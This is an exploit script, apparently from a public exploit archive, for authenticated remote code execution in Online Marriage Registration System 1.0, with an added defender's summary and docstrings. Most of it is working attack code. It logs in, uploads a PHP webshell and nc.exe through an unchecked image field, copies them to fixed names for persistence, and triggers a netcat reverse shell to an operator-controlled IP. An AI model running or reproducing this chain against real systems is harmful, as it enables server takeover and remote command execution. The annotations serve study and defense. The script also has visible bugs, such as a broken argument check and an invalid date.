# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-14-12
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server

# Reviewer summary (defender's reading of the script below):
#   Root cause: the husimage field of /user/marriage-reg-form.php accepts a
#   non-image upload (the script sends application/x-php and
#   application/octet-stream bodies) and the stored file is served from
#   /user/images/, where PHP is executed. Mitigation is server-side: validate
#   the upload by content (not the client-supplied Content-Type or filename),
#   store uploads outside the web root or deny script execution in the
#   images directory, and disable directory indexing of /user/images/.
#   Indicators a responder can look for in web-server logs and on disk:
#   a POST to /user/marriage-reg-form.php with a .php/.exe upload, GETs to
#   /user/images/*.php with a `cmd=` query parameter, files named shell.php
#   and nc.exe in the images directory, and a cmd.exe child of the web server
#   process making an outbound TCP connection.

#!/usr/bin/python3

import requests
import sys
import os
import iterm2
import AppKit

# Positional arguments: target base URL and the credentials of an existing
# application user (the finding is authenticated-only).
url = sys.argv[1]
mobile = sys.argv[2]
password = sys.argv[3]

# CONFIGURE HERE
# Operator-side listener endpoint that the target is made to connect back to.
reverse_ip = '192.168.xx.xx'
reverse_port = 4444

# CONFIGURE HERE
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
# Local paths of the two files that get uploaded through the form.
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'


def login(url: str, mobile: str, password: str) -> str:
    """Authenticate against /user/login.php and return the PHPSESSID cookie value.

    Raises KeyError if the response carries no PHPSESSID cookie (no check is
    made that the login actually succeeded).
    """
    url = "{}/user/login.php".format(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    cookie = req.cookies['PHPSESSID']
    return cookie


def upload(url: str, cookie: str, file: str | None = None) -> None:
    """Submit the marriage registration form with *file* as the husimage upload.

    The Content-Type is chosen from the local extension only; the form data is
    filler. Nothing in the response is inspected, so success is assumed.
    The opened file handle is never closed.
    """
    f = open(file, 'rb')
    filename, ext = os.path.splitext(file)
    # Extension-based Content-Type: this is exactly what a server must not
    # trust — the value is entirely client-controlled.
    if "exe" in ext:
        content_type = 'application/octet-stream'
    else:
        content_type = 'application/x-php'
    cookie = {'PHPSESSID':cookie}
    url = "{}/user/marriage-reg-form.php".format(url)
    # husimage carries the real file; wifeimage is an empty placeholder.
    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
    req = requests.post(url, data=payload, cookies=cookie, files=files)
    print(f'[+] File {ext} uploaded')


def get_remote_file(url: str, ext: str) -> str:
    """Recover the server-side name of the uploaded file with extension *ext*.

    Fetches /user/images and takes the 42 characters preceding the first
    occurrence of *ext* in the response body. This appears to depend on
    directory indexing being enabled for that path (TODO confirm against the
    application); disabling indexing removes this discovery step but not the
    upload flaw itself.
    """
    url = "{}/user/images".format(url)
    req = requests.get(url)
    junk = req.text.split(ext)[0]
    f = junk[-42:] + ext
    return f


def persistence(url: str, webshell: str, netcat: str) -> None:
    """Copy the uploaded files to fixed names (shell.php, nc.exe) via the webshell.

    Both requests are GETs to /user/images/<webshell>?cmd=..., i.e. the
    uploaded PHP executes OS commands from its query string. Responses are
    not checked. On the target these leave shell.php and nc.exe in the
    images directory and `cmd=copy ...` entries in the access log.
    """
    # webshell
    payload_w = "copy /y {} shell.php".format(webshell)
    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
    req_w = requests.get(url_w)
    # netcat
    payload_n = "copy /y {} nc.exe".format(netcat)
    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
    req_n= requests.get(url_n)
    print('[+] Persistence enabled')


def get_reverse(url: str, ip: str, port: int) -> None:
    """Ask shell.php to run nc.exe so the target connects out to ip:port.

    From the server's side this is cmd.exe spawned under the web server
    process with an outbound connection to an arbitrary host — both are
    high-signal events for EDR and egress filtering.
    """
    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
    print('[+] Reverse shell incoming!')
    req = requests.get(url_r)


# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port: int) -> None:
    """Operator-side only: open an iTerm2 tab running a netcat listener on *port*.

    Uses the macOS AppKit and iterm2 packages; nothing here touches the
    target. The nested coroutine is run to completion by iterm2 and prints
    a message if no iTerm2 window is current.
    """
    # Launch the app
    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")

    async def main(connection):
        app = await iterm2.async_get_app(connection)
        window = app.current_window
        if window is not None:
            cmd = "nc -lnv {}".format(port)
            await window.async_create_tab(command=cmd)
        else:
            print("No current window")

    iterm2.run_until_complete(main)


if __name__ == "__main__":
    # Note the positional reads of sys.argv[1..3] happen at import time
    # above, before this guard is evaluated.
    if len(sys.argv < 3):
        print("Usage: exploit.py ")
    else:
        # Sequence: authenticate, upload both files, learn their stored
        # names, rename them via the webshell, start the local listener,
        # then trigger the connect-back.
        cookie = login(url, mobile, password)
        upload(url, cookie, netcat_path)
        upload(url, cookie, shell_path)
        webshell = get_remote_file(url, '.php')
        netcat = get_remote_file(url, '.exe')
        persistence(url, webshell, netcat)
        start_listener(reverse_port)
        get_reverse(url, reverse_ip, reverse_port)